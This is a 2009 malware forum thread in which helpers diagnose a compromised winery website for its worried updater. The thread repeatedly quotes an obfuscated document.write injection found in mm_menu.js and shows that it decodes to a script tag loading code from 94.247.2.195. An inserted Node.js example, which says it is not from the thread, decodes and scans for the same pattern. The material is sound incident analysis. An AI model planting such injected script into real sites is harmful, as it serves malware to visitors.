Malware Domain List
Malware Related => Compromised Servers => Topic started by: gabbafam on April 16, 2009, 12:32:59 pm
-
Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time I access one website, www.haakwine.com. I did a Yahoo search on 94.247.2.195 and found this malware domain list and forum. I don't know if you are the right person to post a reply to, but I am really wanting to find out how to clean this off this website, because I am the website updater and don't know why it is doing this. Can you offer any help whatsoever? I would be greatly indebted to you.
I think you could be right :( ..... the following is the uncompressed output from the PDF;
/edit
MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum
-
I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?
/edit
Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
This decodes to;
<script src=//94.247.2.195/jquery.js></script>
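To show the decoding step above without running the injected line in a browser, here is an added example (not code from the thread or from Malware Domain List) for Node.js: it reproduces the unescape-then-strip-junk transformation on the posted string, scans a constructed mm_menu.js-style file for the same document.write(unescape(...).replace(...)) pattern, and extracts the external script source that would be injected. The sample file content and the function names are assumptions for the example.

```javascript
// Added example: static decoder for the document.write(unescape(...).replace(...))
// injection quoted in this thread. Nothing here executes the decoded payload.

// The obfuscated string exactly as posted in the thread.
const OBFUSCATED =
  'sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E';
// The junk tokens the injected code strips after percent-decoding.
const JUNK = /uhI|Zt|LSk|AH|sV|CgA|JaN/g;

// Decode step: percent-decode, then remove the junk tokens. This mirrors what
// the injected line does before handing the result to document.write.
function decodePayload(encoded, junk) {
  return unescape(encoded).replace(junk, '');
}

// Pattern for the injection as it appears in a .js file:
//   document.write(unescape('<encoded>').replace(/<junk>/g,""));
const INJECTION = /document\.write\(unescape\('([^']*)'\)\.replace\(\/([^/]*)\/g,\s*""\)\)/g;

// Scan file text and return each injection found with its decoded payload.
function findInjections(source) {
  const hits = [];
  for (const m of source.matchAll(INJECTION)) {
    const junk = new RegExp(m[2], 'g');
    hits.push({ raw: m[0], decoded: decodePayload(m[1], junk) });
  }
  return hits;
}

// Pull external script sources out of decoded HTML; these are the indicators
// worth blocking and searching the rest of the site for.
function scriptSources(html) {
  return [...html.matchAll(/<script[^>]*\bsrc=["']?([^"'\s>]+)/gi)].map(m => m[1]);
}

// Constructed sample (assumption): a legitimate menu script with the
// injected line appended, as the thread describes for mm_menu.js.
const SAMPLE_JS =
  'function mm_showMenu() { /* legitimate menu code */ }\n' +
  `document.write(unescape('${OBFUSCATED}').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));\n`;

for (const hit of findInjections(SAMPLE_JS)) {
  console.log('decoded payload :', hit.decoded);
  console.log('external scripts:', scriptSources(hit.decoded));
}
```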
-
There's a malware script in mm_menu.js
<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
-->
-
heh yep, updated my post whilst you were posting ....
-
The script is also present in:
http://www.haakwine.com/Scripts/AC_RunActiveContent.js
-
It is also present in the last line of
www.haakwine.com/mm_menu.js
http://wepawet.cs.ucsb.edu/view.php?hash=fc23e5732b039b053d6bd7a04a30fdec&t=1239885919&type=js
-
I wish I knew all that you all know on this forum. I am sure this is a stupid question for you, but "how do you disable a file?" Thank you so much.
-
By "disable", it simply means removing the code posted above from the HTML/PHP files where it is present...
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
-
Speaking of it...
http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html